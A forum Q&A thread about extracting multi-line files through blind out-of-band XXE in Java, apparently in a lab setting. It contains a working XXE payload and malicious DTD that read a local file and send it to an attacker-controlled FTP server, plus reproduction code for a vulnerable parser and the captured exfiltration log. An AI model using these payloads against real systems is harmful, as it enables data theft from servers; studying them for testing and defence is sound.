# XXE - Unable to retrieve files with multiple lines

Tags: java, xml, xxe

I have created a Java application vulnerable to (blind) XXE.

I am able to exploit the vulnerability and retrieve a file that contains a single line using the following approach:

1) Intercept the XML request and modify it as follow:

```
<?xml version='1.0'?>
    <!DOCTYPE xxe [
        <!ENTITY % EvilDTD SYSTEM 'http://192.168.27.152/evil_oob.dtd'>
        %EvilDTD;
        %LoadOOBEnt;
        %OOB;
    ]>
```

2) On 192.168.27.152, serve the following evil_oob.dtd on port 80:

```
<!ENTITY % resource SYSTEM "file:///C:/temp/test.txt">
<!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'ftp://192.168.27.152:2121/%resource;'>">
```

3) Run a modified FTP server ([Python](https://github.com/lc/230-OOB/blob/master/230.py)) on the attacker machine on port 2121.

As I explained earlier, everything works fine when test.txt contains a single line. However, if test.txt contains multiple lines (and therefore a carriage return), the ftp URL is not valid and I get the following error:

```
java.io.IOException: sun.net.ftp.FtpProtocolException: Illegal FTP
command     at
 sun.net.www.protocol.ftp.FtpURLConnection.getInputStream(FtpURLConnection.java:518)

<... snip ...>

at java.lang.Thread.run(Thread.java:748) Caused by:
  sun.net.ftp.FtpProtocolException: Illegal FTP command     at
  sun.net.ftp.impl.FtpClient.issueCommand(FtpClient.java:533)   at
  sun.net.ftp.impl.FtpClient.openDataConnection(FtpClient.java:752)     at
  sun.net.ftp.impl.FtpClient.getFileStream(FtpClient.java:1293)     at
  sun.net.www.protocol.ftp.FtpURLConnection.getInputStream(FtpURLConnection.java:435)
    ... 114 more Caused by: java.lang.IllegalArgumentException: **Illegal
  carriage return**     at
  sun.net.ftp.impl.FtpClient.issueCommand(FtpClient.java:535)
```

I have also tried to replace the FTP server by an http server running on a different port, but I am of course getting a similar error as the URL is also not valid in this case.

I am wondering if it is even possible to retrieve a file that contains multiple lines through a blind XXE? I know that with PHP you can sometimes use PHP filters to base64 encode the file, but this is not the case with Java.

I have read dozens of posts but could not find a way to achieve my goal.

Comment: there is no limitation in theory for reading a file. You can read as many line you have in it. The limitation is more in the implementation of your backend application who is vulnerable to XXE. For example, in OWASP Juice Shop, we have an XXE who just return the 200 first characters.

Answer (score 0):

This used to work on old versions of Java but not any more. It was patched at some point in Java 7.

You can test it by using an old version of Java on a docker container. I couldn't find one readily available, but you can just use an old version of Alpine to test this quickly. Here's an example `Dockerfile` for it:

```
FROM alpine:3.3

ENV JAVA_HOME=/usr/lib/jvm/default-jvm

RUN apk add --no-cache openjdk7 && \
    ln -sf "${JAVA_HOME}/bin/"* "/usr/bin/"
```

Build it:

```
docker build -t openjdk7:91 .
```

You can simulate a vulnerable server by using the following code:

```java
import javax.xml.parsers.*;
import org.xml.sax.*;
import javax.xml.transform.dom.*;
import org.w3c.dom.Document;

public class JavaXXE{

    public static void main(String []args) throws Exception{

        String xml = "xxe_trigger.xml";
        DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = df.newDocumentBuilder();
        Document document = builder.parse(new InputSource(xml));
        DOMSource domSource = new DOMSource(document);
    
    }
}
```

Save this file as `JavaXXE.java`. Put your XML (and XXEs) inside a file called `xxe_trigger.xml`. Then run the code on the docker (it will map the current directory to the Docker's /tmp):

```
docker run --rm -v `pwd`:/tmp --workdir /tmp openjdk7:91 sh -c '/usr/lib/jvm/default-jvm/bin/javac JavaXXE.java && java JavaXXE'
```

You will see that it will hit your FTP server and dump all the lines of the file as commands. PoC:

```
FTP. New client connected
< USER anonymous
< PASS Java1.7.0_91@
>230 user logged in
< TYPE I
> 230 more data please!
< EPSV ALL
> 230 more data please!
< EPSV
> 230 more data please!
< EPRT |1|172.17.0.2|35351|
200 EPRT command ok
< RETR this is a two line test to 
> 230 more data please!
< check newline handling capability
> 230 more data please!
```

Answer (score 0):

That's because of the new versions of Java doesn’t allow multiline URIs. For those who are having this problem, you can try to switch to lower java versions like JDK8u102